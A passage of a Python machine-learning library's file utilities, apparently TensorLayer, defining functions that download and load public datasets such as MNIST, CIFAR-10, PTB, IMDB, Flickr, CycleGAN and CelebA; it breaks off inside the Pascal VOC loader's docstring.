saver.restore(sess, "model.ckpt")
## save model as .npz
tl.files.save_npz(network.all_params , name='model.npz')
# restore model from .npz (method 1)
load_params = tl.files.load_npz(name='model.npz')
tl.files.assign_params(sess, load_params, network)
# restore model from .npz (method 2)
tl.files.load_and_assign_npz(sess=sess, name='model.npz', network=network)
## you can assign the pre-trained parameters as follow
# 1st parameter
tl.files.assign_params(sess, [load_params[0]], network)
# the first three parameters
tl.files.assign_params(sess, load_params[:3], network)
"""
import gzip
import os
import pickle
import re
import sys
import tarfile
import zipfile
import numpy as np
import tensorflow as tf
from six.moves import cPickle, zip
from tensorflow.python.platform import gfile
from . import _logging as logging
from . import nlp, utils, visualize
## Load dataset functions
def load_mnist_dataset(shape=(-1, 784), path='data'):
    """Load the original mnist.
    Automatically download MNIST dataset and return the training, validation and test set with 50000, 10000 and 10000 digit images respectively.
    Parameters
    ----------
    shape : tuple
        The shape of digit images (the default is (-1, 784), alternatively (-1, 28, 28, 1)).
    path : str
        The path that the data is downloaded to.
    Returns
    -------
    X_train, y_train, X_val, y_val, X_test, y_test: tuple
        Return split training/validation/test set respectively.
    Examples
    --------
    >>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_mnist_dataset(shape=(-1,784), path='datasets')
    >>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_mnist_dataset(shape=(-1, 28, 28, 1))
    """
    # Thin wrapper: all the work happens in the shared MNIST-format loader.
    return _load_mnist_dataset(shape, path, name='mnist', url='http://yann.lecun.com/exdb/mnist/')
def load_fashion_mnist_dataset(shape=(-1, 784), path='data'):
    """Load the fashion mnist.
    Automatically download fashion-MNIST dataset and return the training, validation and test set with 50000, 10000 and 10000 fashion images respectively, `examples <http://marubon-ds.blogspot.co.uk/2017/09/fashion-mnist-exploring.html>`__.
    Parameters
    ----------
    shape : tuple
        The shape of digit images (the default is (-1, 784), alternatively (-1, 28, 28, 1)).
    path : str
        The path that the data is downloaded to.
    Returns
    -------
    X_train, y_train, X_val, y_val, X_test, y_test: tuple
        Return split training/validation/test set respectively.
    Examples
    --------
    >>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_fashion_mnist_dataset(shape=(-1,784), path='datasets')
    >>> X_train, y_train, X_val, y_val, X_test, y_test = tl.files.load_fashion_mnist_dataset(shape=(-1, 28, 28, 1))
    """
    # Fashion-MNIST ships in the same IDX file format as MNIST, so it reuses
    # the generic loader with a different mirror URL.
    return _load_mnist_dataset(shape, path, name='fashion_mnist', url='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/')
def _load_mnist_dataset(shape, path, name='mnist', url='http://yann.lecun.com/exdb/mnist/'):
    """A generic function to load mnist-like dataset.
    Parameters:
    ----------
    shape : tuple
        The shape of digit images.
    path : str
        The path that the data is downloaded to.
    name : str
        The dataset name you want to use(the default is 'mnist').
    url : str
        The url of dataset(the default is 'http://yann.lecun.com/exdb/mnist/').
    """
    # Keep each dataset in its own subdirectory, e.g. data/mnist/.
    path = os.path.join(path, name)
    # Define functions for loading mnist-like data's images and labels.
    # For convenience, they also download the requested files if needed.
    def load_mnist_images(path, filename):
        filepath = maybe_download_and_extract(filename, path, url)
        logging.info(filepath)
        # Read the inputs in Yann LeCun's binary format.
        # offset=16 skips the IDX image-file header (magic, count, rows, cols).
        with gzip.open(filepath, 'rb') as f:
            data = np.frombuffer(f.read(), np.uint8, offset=16)
        # The inputs are vectors now, we reshape them to monochrome 2D images,
        # following the shape convention: (examples, channels, rows, columns)
        data = data.reshape(shape)
        # The inputs come as bytes, we convert them to float32 in range [0,1].
        # (Actually to range [0, 255/256], for compatibility to the version
        # provided at http://deeplearning.net/data/mnist/mnist.pkl.gz.)
        return data / np.float32(256)
    def load_mnist_labels(path, filename):
        filepath = maybe_download_and_extract(filename, path, url)
        # Read the labels in Yann LeCun's binary format.
        # offset=8 skips the IDX label-file header (magic, count).
        with gzip.open(filepath, 'rb') as f:
            data = np.frombuffer(f.read(), np.uint8, offset=8)
        # The labels are vectors of integers now, that's exactly what we want.
        return data
    # Download and read the training and test set images and labels.
    logging.info("Load or Download {0} > {1}".format(name.upper(), path))
    X_train = load_mnist_images(path, 'train-images-idx3-ubyte.gz')
    y_train = load_mnist_labels(path, 'train-labels-idx1-ubyte.gz')
    X_test = load_mnist_images(path, 't10k-images-idx3-ubyte.gz')
    y_test = load_mnist_labels(path, 't10k-labels-idx1-ubyte.gz')
    # We reserve the last 10000 training examples for validation.
    X_train, X_val = X_train[:-10000], X_train[-10000:]
    y_train, y_val = y_train[:-10000], y_train[-10000:]
    # We just return all the arrays in order, as expected in main().
    # (It doesn't matter how we do this as long as we can read them again.)
    X_train = np.asarray(X_train, dtype=np.float32)
    y_train = np.asarray(y_train, dtype=np.int32)
    X_val = np.asarray(X_val, dtype=np.float32)
    y_val = np.asarray(y_val, dtype=np.int32)
    X_test = np.asarray(X_test, dtype=np.float32)
    y_test = np.asarray(y_test, dtype=np.int32)
    return X_train, y_train, X_val, y_val, X_test, y_test
def load_cifar10_dataset(shape=(-1, 32, 32, 3), path='data', plotable=False):
    """Load CIFAR-10 dataset.
    It consists of 60000 32x32 colour images in 10 classes, with
    6000 images per class. There are 50000 training images and 10000 test images.
    The dataset is divided into five training batches and one test batch, each with
    10000 images. The test batch contains exactly 1000 randomly-selected images from
    each class. The training batches contain the remaining images in random order,
    but some training batches may contain more images from one class than another.
    Between them, the training batches contain exactly 5000 images from each class.
    Parameters
    ----------
    shape : tuple
        The shape of digit images e.g. (-1, 3, 32, 32) and (-1, 32, 32, 3).
    path : str
        The path that the data is downloaded to, defaults is ``data/cifar10/``.
    plotable : boolean
        Whether to plot some image examples, False as default.
    Examples
    --------
    >>> X_train, y_train, X_test, y_test = tl.files.load_cifar10_dataset(shape=(-1, 32, 32, 3))
    References
    ----------
    - `CIFAR website <https://www.cs.toronto.edu/~kriz/cifar.html>`__
    - `Data download link <https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz>`__
    - `<https://teratail.com/questions/28932>`__
    """
    path = os.path.join(path, 'cifar10')
    logging.info("Load or Download cifar10 > {}".format(path))
    #Helper function to unpickle the data
    def unpickle(file):
        fp = open(file, 'rb')
        if sys.version_info.major == 2:
            data = pickle.load(fp)
        elif sys.version_info.major == 3:
            # latin-1 decodes the Python-2 pickle byte strings on Python 3
            data = pickle.load(fp, encoding='latin-1')
        fp.close()
        return data
    filename = 'cifar-10-python.tar.gz'
    url = 'https://www.cs.toronto.edu/~kriz/'
    #Download and uncompress file
    maybe_download_and_extract(filename, path, url, extract=True)
    #Unpickle file and fill in data
    X_train = None
    y_train = []
    for i in range(1, 6):
        data_dic = unpickle(os.path.join(path, 'cifar-10-batches-py/', "data_batch_{}".format(i)))
        if i == 1:
            X_train = data_dic['data']
        else:
            X_train = np.vstack((X_train, data_dic['data']))
        y_train += data_dic['labels']
    test_data_dic = unpickle(os.path.join(path, 'cifar-10-batches-py/', "test_batch"))
    X_test = test_data_dic['data']
    y_test = np.array(test_data_dic['labels'])
    if shape == (-1, 3, 32, 32):
        X_test = X_test.reshape(shape)
        X_train = X_train.reshape(shape)
    elif shape == (-1, 32, 32, 3):
        # The raw rows are channel-major (RRR...GGG...BBB); Fortran-order
        # reshape followed by a transpose yields HWC images.
        X_test = X_test.reshape(shape, order='F')
        X_train = X_train.reshape(shape, order='F')
        X_test = np.transpose(X_test, (0, 2, 1, 3))
        X_train = np.transpose(X_train, (0, 2, 1, 3))
    else:
        X_test = X_test.reshape(shape)
        X_train = X_train.reshape(shape)
    y_train = np.array(y_train)
    if plotable:
        logging.info('\nCIFAR-10')
        import matplotlib.pyplot as plt
        fig = plt.figure(1)
        logging.info('Shape of a training image: X_train[0] %s' % X_train[0].shape)
        plt.ion()  # interactive mode
        count = 1
        for _ in range(10):  # each row
            for _ in range(10):  # each column
                _ = fig.add_subplot(10, 10, count)
                if shape == (-1, 3, 32, 32):
                    # plt.imshow(X_train[count-1], interpolation='nearest')
                    plt.imshow(np.transpose(X_train[count - 1], (1, 2, 0)), interpolation='nearest')
                    # plt.imshow(np.transpose(X_train[count-1], (2, 1, 0)), interpolation='nearest')
                elif shape == (-1, 32, 32, 3):
                    plt.imshow(X_train[count - 1], interpolation='nearest')
                    # plt.imshow(np.transpose(X_train[count-1], (1, 0, 2)), interpolation='nearest')
                else:
                    raise Exception("Do not support the given 'shape' to plot the image examples")
                plt.gca().xaxis.set_major_locator(plt.NullLocator())  # hide tick marks
                plt.gca().yaxis.set_major_locator(plt.NullLocator())
                count = count + 1
        plt.draw()  # interactive mode
        plt.pause(3)  # interactive mode
    logging.info("X_train: %s" % X_train.shape)
    logging.info("y_train: %s" % y_train.shape)
    logging.info("X_test: %s" % X_test.shape)
    logging.info("y_test: %s" % y_test.shape)
    X_train = np.asarray(X_train, dtype=np.float32)
    X_test = np.asarray(X_test, dtype=np.float32)
    y_train = np.asarray(y_train, dtype=np.int32)
    y_test = np.asarray(y_test, dtype=np.int32)
    return X_train, y_train, X_test, y_test
def load_ptb_dataset(path='data'):
    """Load Penn TreeBank (PTB) dataset.
    It is used in many LANGUAGE MODELING papers,
    including "Empirical Evaluation and Combination of Advanced Language
    Modeling Techniques", "Recurrent Neural Network Regularization".
    It consists of 929k training words, 73k validation words, and 82k test
    words. It has 10k words in its vocabulary.
    Parameters
    ----------
    path : str
        The path that the data is downloaded to, defaults is ``data/ptb/``.
    Returns
    --------
    train_data, valid_data, test_data : list of int
        The training, validating and testing data in integer format.
    vocab_size : int
        The vocabulary size.
    Examples
    --------
    >>> train_data, valid_data, test_data, vocab_size = tl.files.load_ptb_dataset()
    References
    ---------------
    - ``tensorflow.models.rnn.ptb import reader``
    - `Manual download <http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz>`__
    Notes
    ------
    - If you want to get the raw data, see the source code.
    """
    path = os.path.join(path, 'ptb')
    logging.info("Load or Download Penn TreeBank (PTB) dataset > {}".format(path))
    #Maybe dowload and uncompress tar, or load exsisting files
    filename = 'simple-examples.tgz'
    url = 'http://www.fit.vutbr.cz/~imikolov/rnnlm/'
    maybe_download_and_extract(filename, path, url, extract=True)
    data_path = os.path.join(path, 'simple-examples', 'data')
    train_path = os.path.join(data_path, "ptb.train.txt")
    valid_path = os.path.join(data_path, "ptb.valid.txt")
    test_path = os.path.join(data_path, "ptb.test.txt")
    # The vocabulary is built from the training split only; valid/test words
    # are mapped through the same word -> id table.
    word_to_id = nlp.build_vocab(nlp.read_words(train_path))
    train_data = nlp.words_to_word_ids(nlp.read_words(train_path), word_to_id)
    valid_data = nlp.words_to_word_ids(nlp.read_words(valid_path), word_to_id)
    test_data = nlp.words_to_word_ids(nlp.read_words(test_path), word_to_id)
    vocab_size = len(word_to_id)
    # logging.info(nlp.read_words(train_path)) # ... 'according', 'to', 'mr.', '<unk>', '<eos>']
    # logging.info(train_data) # ...  214,         5,    23,    1,       2]
    # logging.info(word_to_id) # ... 'beyond': 1295, 'anti-nuclear': 9599, 'trouble': 1520, '<eos>': 2 ... }
    # logging.info(vocabulary) # 10000
    # exit()
    return train_data, valid_data, test_data, vocab_size
def load_matt_mahoney_text8_dataset(path='data'):
    """Load Matt Mahoney's dataset.
    Download a text file from Matt Mahoney's website
    if not present, and make sure it's the right size.
    Extract the first file enclosed in a zip file as a list of words.
    This dataset can be used for Word Embedding.
    Parameters
    ----------
    path : str
        The path that the data is downloaded to, defaults is ``data/mm_test8/``.
    Returns
    --------
    list of str
        The raw text data e.g. [.... 'their', 'families', 'who', 'were', 'expelled', 'from', 'jerusalem', ...]
    Examples
    --------
    >>> words = tl.files.load_matt_mahoney_text8_dataset()
    >>> print('Data size', len(words))
    """
    path = os.path.join(path, 'mm_test8')
    logging.info("Load or Download matt_mahoney_text8 Dataset> {}".format(path))
    filename = 'text8.zip'
    url = 'http://mattmahoney.net/dc/'
    # expected_bytes guards against a truncated or corrupted download.
    maybe_download_and_extract(filename, path, url, expected_bytes=31344016)
    with zipfile.ZipFile(os.path.join(path, filename)) as f:
        # The archive contains a single member; split it into bytes tokens.
        word_list = f.read(f.namelist()[0]).split()
    # Decode bytes -> str in one pass (replaces the previous in-place
    # index-by-index mutation loop with the idiomatic comprehension).
    return [w.decode() for w in word_list]
def load_imdb_dataset(path='data', nb_words=None, skip_top=0, maxlen=None, test_split=0.2, seed=113, start_char=1, oov_char=2, index_from=3):
    """Load IMDB dataset.
    Parameters
    ----------
    path : str
        The path that the data is downloaded to, defaults is ``data/imdb/``.
    nb_words : int
        Number of words to get.
    skip_top : int
        Top most frequent words to ignore (they will appear as oov_char value in the sequence data).
    maxlen : int
        Maximum sequence length. Any longer sequence will be truncated.
    seed : int
        Seed for reproducible data shuffling.
    start_char : int
        The start of a sequence will be marked with this character. Set to 1 because 0 is usually the padding character.
    oov_char : int
        Words that were cut out because of the num_words or skip_top limit will be replaced with this character.
    index_from : int
        Index actual words with this index and higher.
    Examples
    --------
    >>> X_train, y_train, X_test, y_test = tl.files.load_imdb_dataset(
    ...                                 nb_words=20000, test_split=0.2)
    >>> print('X_train.shape', X_train.shape)
    ... (20000,)  [[1, 62, 74, ... 1033, 507, 27],[1, 60, 33, ... 13, 1053, 7]..]
    >>> print('y_train.shape', y_train.shape)
    ... (20000,)  [1 0 0 ..., 1 0 1]
    References
    -----------
    - `Modified from keras. <https://github.com/fchollet/keras/blob/master/keras/datasets/imdb.py>`__
    """
    path = os.path.join(path, 'imdb')
    filename = "imdb.pkl"
    url = 'https://s3.amazonaws.com/text-datasets/'
    maybe_download_and_extract(filename, path, url)
    if filename.endswith(".gz"):
        f = gzip.open(os.path.join(path, filename), 'rb')
    else:
        f = open(os.path.join(path, filename), 'rb')
    X, labels = cPickle.load(f)
    f.close()
    # Re-seeding with the same value before each shuffle keeps X and labels
    # aligned after shuffling.
    np.random.seed(seed)
    np.random.shuffle(X)
    np.random.seed(seed)
    np.random.shuffle(labels)
    if start_char is not None:
        # Prepend the start marker and shift word ids up by index_from.
        X = [[start_char] + [w + index_from for w in x] for x in X]
    elif index_from:
        X = [[w + index_from for w in x] for x in X]
    if maxlen:
        # Keep only sequences strictly shorter than maxlen.
        new_X = []
        new_labels = []
        for x, y in zip(X, labels):
            if len(x) < maxlen:
                new_X.append(x)
                new_labels.append(y)
        X = new_X
        labels = new_labels
    if not X:
        raise Exception('After filtering for sequences shorter than maxlen=' + str(maxlen) + ', no sequence was kept. ' 'Increase maxlen.')
    if not nb_words:
        nb_words = max([max(x) for x in X])
    # by convention, use 2 as OOV word
    # reserve 'index_from' (=3 by default) characters: 0 (padding), 1 (start), 2 (OOV)
    if oov_char is not None:
        # Replace out-of-vocabulary / too-frequent words with the OOV marker.
        X = [[oov_char if (w >= nb_words or w < skip_top) else w for w in x] for x in X]
    else:
        # NOTE(review): with oov_char=None this KEEPS only the filtered-out
        # words (w >= nb_words or w < skip_top) and drops in-vocabulary ones;
        # this mirrors the upstream keras code -- confirm intent.
        nX = []
        for x in X:
            nx = []
            for w in x:
                if (w >= nb_words or w < skip_top):
                    nx.append(w)
            nX.append(nx)
        X = nX
    X_train = np.array(X[:int(len(X) * (1 - test_split))])
    y_train = np.array(labels[:int(len(X) * (1 - test_split))])
    X_test = np.array(X[int(len(X) * (1 - test_split)):])
    y_test = np.array(labels[int(len(X) * (1 - test_split)):])
    return X_train, y_train, X_test, y_test
def load_nietzsche_dataset(path='data'):
    """Load Nietzsche dataset.
    Parameters
    ----------
    path : str
        The path that the data is downloaded to, defaults is ``data/nietzsche/``.
    Returns
    --------
    str
        The content.
    Examples
    --------
    >>> see tutorial_generate_text.py
    >>> words = tl.files.load_nietzsche_dataset()
    >>> words = basic_clean_str(words)
    >>> words = words.split()
    """
    logging.info("Load or Download nietzsche dataset > {}".format(path))
    path = os.path.join(path, 'nietzsche')
    filename = "nietzsche.txt"
    url = 'https://s3.amazonaws.com/text-datasets/'
    filepath = maybe_download_and_extract(filename, path, url)
    # Return the whole corpus as one string; callers tokenise it themselves.
    with open(filepath, "r") as f:
        words = f.read()
        return words
def load_wmt_en_fr_dataset(path='data'):
    """Load WMT'15 English-to-French translation dataset.
    It will download the data from the WMT'15 Website (10^9-French-English corpus), and the 2013 news test from the same site as development set.
    Returns the directories of training data and test data.
    Parameters
    ----------
    path : str
        The path that the data is downloaded to, defaults is ``data/wmt_en_fr/``.
    References
    ----------
    - Code modified from /tensorflow/models/rnn/translation/data_utils.py
    Notes
    -----
    Usually, it will take a long time to download this dataset.
    """
    path = os.path.join(path, 'wmt_en_fr')
    # URLs for WMT data.
    _WMT_ENFR_TRAIN_URL = "http://www.statmt.org/wmt10/"
    _WMT_ENFR_DEV_URL = "http://www.statmt.org/wmt15/"
    def gunzip_file(gz_path, new_path):
        """Unzips from gz_path into new_path."""
        logging.info("Unpacking %s to %s" % (gz_path, new_path))
        with gzip.open(gz_path, "rb") as gz_file:
            with open(new_path, "wb") as new_file:
                for line in gz_file:
                    new_file.write(line)
    def get_wmt_enfr_train_set(path):
        """Download the WMT en-fr training corpus to directory unless it's there."""
        filename = "training-giga-fren.tar"
        maybe_download_and_extract(filename, path, _WMT_ENFR_TRAIN_URL, extract=True)
        train_path = os.path.join(path, "giga-fren.release2.fixed")
        gunzip_file(train_path + ".fr.gz", train_path + ".fr")
        gunzip_file(train_path + ".en.gz", train_path + ".en")
        return train_path
    def get_wmt_enfr_dev_set(path):
        """Download the WMT en-fr dev (newstest2013) set to directory unless it's there."""
        filename = "dev-v2.tgz"
        dev_file = maybe_download_and_extract(filename, path, _WMT_ENFR_DEV_URL, extract=False)
        dev_name = "newstest2013"
        dev_path = os.path.join(path, "newstest2013")
        if not (gfile.Exists(dev_path + ".fr") and gfile.Exists(dev_path + ".en")):
            logging.info("Extracting tgz file %s" % dev_file)
            with tarfile.open(dev_file, "r:gz") as dev_tar:
                fr_dev_file = dev_tar.getmember("dev/" + dev_name + ".fr")
                en_dev_file = dev_tar.getmember("dev/" + dev_name + ".en")
                fr_dev_file.name = dev_name + ".fr"  # Extract without "dev/" prefix.
                en_dev_file.name = dev_name + ".en"
                dev_tar.extract(fr_dev_file, path)
                dev_tar.extract(en_dev_file, path)
        return dev_path
    logging.info("Load or Download WMT English-to-French translation > {}".format(path))
    train_path = get_wmt_enfr_train_set(path)
    dev_path = get_wmt_enfr_dev_set(path)
    return train_path, dev_path
def load_flickr25k_dataset(tag='sky', path="data", n_threads=50, printable=False):
    """Load Flickr25K dataset.
    Returns a list of images by a given tag from Flick25k dataset,
    it will download Flickr25k from `the official website <http://press.liacs.nl/mirflickr/mirdownload.html>`__
    at the first time you use it.
    Parameters
    ------------
    tag : str or None
        What images to return.
            - If you want to get images with tag, use string like 'dog', 'red', see `Flickr Search <https://www.flickr.com/search/>`__.
            - If you want to get all images, set to ``None``.
    path : str
        The path that the data is downloaded to, defaults is ``data/flickr25k/``.
    n_threads : int
        The number of thread to read image.
    printable : boolean
        Whether to print infomation when reading images, default is ``False``.
    Examples
    -----------
    Get images with tag of sky
    >>> images = tl.files.load_flickr25k_dataset(tag='sky')
    Get all images
    >>> images = tl.files.load_flickr25k_dataset(tag=None, n_threads=100, printable=True)
    """
    path = os.path.join(path, 'flickr25k')
    filename = 'mirflickr25k.zip'
    url = 'http://press.liacs.nl/mirflickr/mirflickr25k/'
    # download dataset
    if folder_exists(path + "/mirflickr") is False:
        logging.info("[*] Flickr25k is nonexistent in {}".format(path))
        maybe_download_and_extract(filename, path, url, extract=True)
        del_file(path + '/' + filename)
    # return images by the given tag.
    # 1. image path list
    folder_imgs = path + "/mirflickr"
    path_imgs = load_file_list(path=folder_imgs, regx='\\.jpg', printable=False)
    # natural_keys keeps im2.jpg before im10.jpg so images and tag files stay
    # index-aligned after both sorts.
    path_imgs.sort(key=natural_keys)
    # 2. tag path list
    folder_tags = path + "/mirflickr/meta/tags"
    path_tags = load_file_list(path=folder_tags, regx='\\.txt', printable=False)
    path_tags.sort(key=natural_keys)
    # 3. select images
    if tag is None:
        logging.info("[Flickr25k] reading all images")
    else:
        logging.info("[Flickr25k] reading images with tag: {}".format(tag))
    images_list = []
    for idx, _v in enumerate(path_tags):
        tags = read_file(folder_tags + '/' + path_tags[idx]).split('\n')
        # logging.info(idx+1, tags)
        if tag is None or tag in tags:
            images_list.append(path_imgs[idx])
    images = visualize.read_images(images_list, folder_imgs, n_threads=n_threads, printable=printable)
    return images
def load_flickr1M_dataset(tag='sky', size=10, path="data", n_threads=50, printable=False):
    """Load Flick1M dataset.
    Returns a list of images by a given tag from Flickr1M dataset,
    it will download Flickr1M from `the official website <http://press.liacs.nl/mirflickr/mirdownload.html>`__
    at the first time you use it.
    Parameters
    ------------
    tag : str or None
        What images to return.
            - If you want to get images with tag, use string like 'dog', 'red', see `Flickr Search <https://www.flickr.com/search/>`__.
            - If you want to get all images, set to ``None``.
    size : int
        integer between 1 to 10. 1 means 100k images ... 5 means 500k images, 10 means all 1 million images. Default is 10.
    path : str
        The path that the data is downloaded to, defaults is ``data/flickr25k/``.
    n_threads : int
        The number of thread to read image.
    printable : boolean
        Whether to print infomation when reading images, default is ``False``.
    Examples
    ----------
    Use 200k images
    >>> images = tl.files.load_flickr1M_dataset(tag='zebra', size=2)
    Use 1 Million images
    >>> images = tl.files.load_flickr1M_dataset(tag='zebra')
    """
    path = os.path.join(path, 'flickr1M')
    logging.info("[Flickr1M] using {}% of images = {}".format(size * 10, size * 100000))
    # The corpus is split into ten 100k-image archives; only the first
    # `size` archives are downloaded.
    images_zip = [
        'images0.zip', 'images1.zip', 'images2.zip', 'images3.zip', 'images4.zip', 'images5.zip', 'images6.zip', 'images7.zip', 'images8.zip', 'images9.zip'
    ]
    tag_zip = 'tags.zip'
    url = 'http://press.liacs.nl/mirflickr/mirflickr1m/'
    # download dataset
    for image_zip in images_zip[0:size]:
        image_folder = image_zip.split(".")[0]
        # logging.info(path+"/"+image_folder)
        if folder_exists(path + "/" + image_folder) is False:
            # logging.info(image_zip)
            logging.info("[Flickr1M] {} is missing in {}".format(image_folder, path))
            maybe_download_and_extract(image_zip, path, url, extract=True)
            del_file(path + '/' + image_zip)
            # Each archive extracts to "images"; rename it to imagesN.
            # NOTE(review): `mv` makes this POSIX-only -- confirm.
            os.system("mv {} {}".format(path + '/images', path + '/' + image_folder))
        else:
            logging.info("[Flickr1M] {} exists in {}".format(image_folder, path))
    # download tag
    if folder_exists(path + "/tags") is False:
        logging.info("[Flickr1M] tag files is nonexistent in {}".format(path))
        maybe_download_and_extract(tag_zip, path, url, extract=True)
        del_file(path + '/' + tag_zip)
    else:
        logging.info("[Flickr1M] tags exists in {}".format(path))
    # 1. image path list
    images_list = []
    images_folder_list = []
    for i in range(0, size):
        images_folder_list += load_folder_list(path=os.path.join(path, 'images%d' % i))
    # Numeric sort on the trailing folder / file component keeps the image
    # list aligned with the tag list built below.
    images_folder_list.sort(key=lambda s: int(s.split('/')[-1]))  # folder/images/ddd
    for folder in images_folder_list[0:size * 10]:
        tmp = load_file_list(path=folder, regx='\\.jpg', printable=False)
        tmp.sort(key=lambda s: int(s.split('.')[-2]))  # ddd.jpg
        images_list.extend([folder + '/' + x for x in tmp])
    # 2. tag path list
    tag_list = []
    tag_folder_list = load_folder_list(path + "/tags")
    tag_folder_list.sort(key=lambda s: int(s.split('/')[-1]))  # folder/images/ddd
    for folder in tag_folder_list[0:size * 10]:
        tmp = load_file_list(path=folder, regx='\\.txt', printable=False)
        tmp.sort(key=lambda s: int(s.split('.')[-2]))  # ddd.txt
        tmp = [folder + '/' + s for s in tmp]
        tag_list += tmp
    # 3. select images
    logging.info("[Flickr1M] searching tag: {}".format(tag))
    select_images_list = []
    for idx, _val in enumerate(tag_list):
        tags = read_file(tag_list[idx]).split('\n')
        if tag in tags:
            select_images_list.append(images_list[idx])
    logging.info("[Flickr1M] reading images with tag: {}".format(tag))
    images = visualize.read_images(select_images_list, '', n_threads=n_threads, printable=printable)
    return images
def load_cyclegan_dataset(filename='summer2winter_yosemite', path='data'):
    """Load images from CycleGAN's database, see `this link <https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/>`__.

    Parameters
    ------------
    filename : str
        The dataset you want, see `this link <https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/>`__.
    path : str
        The path that the data is downloaded to, defaults is `data/cyclegan`

    Returns
    --------
    tuple of four lists of arrays
        ``(im_train_A, im_train_B, im_test_A, im_test_B)``, each image as HxWx3.

    Examples
    ---------
    >>> im_train_A, im_train_B, im_test_A, im_test_B = load_cyclegan_dataset(filename='summer2winter_yosemite')
    """
    path = os.path.join(path, 'cyclegan')
    url = 'https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/'

    # Fetch and unpack the archive only when the dataset folder is absent.
    if not folder_exists(os.path.join(path, filename)):
        logging.info("[*] {} is nonexistent in {}".format(filename, path))
        maybe_download_and_extract(filename + '.zip', path, url, extract=True)
        del_file(os.path.join(path, filename + '.zip'))

    def _read_split(folder):
        # Read every .jpg of one split (trainA/trainB/testA/testB) into memory.
        jpg_names = load_file_list(path=folder, regx='\\.jpg', printable=False)
        return visualize.read_images(jpg_names, path=folder, n_threads=10, printable=False)

    def _ensure_rgb(images):
        # Promote grayscale [h, w] images to [h, w, 3] so every output
        # image shares the same rank/channel layout.
        for i, img in enumerate(images):
            if len(img.shape) == 2:
                images[i] = np.tile(img[:, :, np.newaxis], (1, 1, 3))
        return images

    splits = []
    for split_name in ("trainA", "trainB", "testA", "testB"):
        splits.append(_ensure_rgb(_read_split(os.path.join(path, filename, split_name))))

    im_train_A, im_train_B, im_test_A, im_test_B = splits
    return im_train_A, im_train_B, im_test_A, im_test_B
def download_file_from_google_drive(ID, destination):
    """Download file from Google Drive.

    See ``tl.files.load_celebA_dataset`` for example.

    Parameters
    --------------
    ID : str
        The driver ID.
    destination : str
        The destination for save file.
    """
    from tqdm import tqdm
    import requests

    URL = "https://docs.google.com/uc?export=download"
    session = requests.Session()

    def _warning_token(response):
        # Large files make Google return a confirmation page; the token
        # we must echo back lives in a 'download_warning*' cookie.
        for key, value in response.cookies.items():
            if key.startswith('download_warning'):
                return value
        return None

    def _stream_to_disk(response, destination, chunk_size=32 * 1024):
        total_size = int(response.headers.get('content-length', 0))
        with open(destination, "wb") as f:
            for chunk in tqdm(response.iter_content(chunk_size), total=total_size, unit='B', unit_scale=True, desc=destination):
                if chunk:  # filter out keep-alive new chunks
                    f.write(chunk)

    response = session.get(URL, params={'id': ID}, stream=True)
    token = _warning_token(response)
    if token:
        # Re-request with the confirmation token to get the real payload.
        response = session.get(URL, params={'id': ID, 'confirm': token}, stream=True)
    _stream_to_disk(response, destination)
def load_celebA_dataset(path='data'):
    """Load CelebA dataset

    Return a list of image path.

    Parameters
    -----------
    path : str
        The path that the data is downloaded to, defaults is ``data/celebA/``.
    """
    data_dir = 'celebA'
    filename, drive_id = "img_align_celeba.zip", "0B7EVK8r0v71pZjFTYXZWM3FlRnM"
    save_path = os.path.join(path, filename)
    image_path = os.path.join(path, data_dir)

    if os.path.exists(image_path):
        # Already unpacked — nothing to download.
        logging.info('[*] {} already exists'.format(save_path))
    else:
        exists_or_mkdir(path)
        download_file_from_google_drive(drive_id, save_path)
        # Unzip, drop the archive, and rename the top-level folder to 'celebA'.
        with zipfile.ZipFile(save_path) as zf:
            zip_dir = zf.namelist()[0]
            zf.extractall(path)
        os.remove(save_path)
        os.rename(os.path.join(path, zip_dir), image_path)

    names = load_file_list(path=image_path, regx='\\.jpg', printable=False)
    return [os.path.join(image_path, name) for name in names]
def load_voc_dataset(path='data', dataset='2012', contain_classes_in_person=False):
    """Pascal VOC 2007/2012 Dataset.

    It has 20 objects:
    aeroplane, bicycle, bird, boat, bottle, bus, car, cat, chair, cow, diningtable, dog, horse, motorbike, person, pottedplant, sheep, sofa, train, tvmonitor
    and additional 3 classes : head, hand, foot for person.

    Parameters
    -----------
    path : str
        The path that the data is downloaded to, defaults is ``data/VOC``.
    dataset : str
        The VOC dataset version, `2012`, `2007`, `2007test` or `2012test`. We usually train model on `2007+2012` and test it on `2007test`.
    contain_classes_in_person : boolean
        Whether include head, hand and foot annotation, default is False.

    Returns
    ---------
    imgs_file_list : list of str
        Full paths of all images.
    imgs_semseg_file_list : list of str
        Full paths of all maps for semantic segmentation. Note that not all images have this map!
    imgs_insseg_file_list : list of str
        Full paths of all maps for instance segmentation. Note that not all images have this map!
    imgs_ann_file_list : list of str
        Full paths of all annotations for bounding box and object class, all images have this annotations.
    classes : list of str
        Classes in order.
    classes_in_person : list of str
        Classes in person.
    classes_dict : dictionary
        Class label to integer.
    n_objs_list : list of int
        Number of objects in all images in ``imgs_file_list`` in order.
    objs_info_list : list of str
        Darknet format for the annotation of all images in ``imgs_file_list`` in order. ``[class_id x_centre y_centre width height]`` in ratio format.
    objs_info_dicts : dictionary
        The annotation of all images in ``imgs_file_list``, ``{imgs_file_list : dictionary for annotation}``,
        format from `TensorFlow/Models/object-detection <https://github.com/tensorflow/models/blob/master/object_detection/create_pascal_tf_record.py>`__.

    Examples
    ----------
    >>> imgs_file_list, imgs_semseg_file_list, imgs_insseg_file_list, imgs_ann_file_list,
    >>> classes, classes_in_person, classes_dict,
    >>> n_objs_list, objs_info_list, objs_info_dicts = tl.files.load_voc_dataset(dataset="2012", contain_classes_in_person=False)
    >>> idx = 26
    >>> print(classes)
    ... ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
    >>> print(classes_dict)
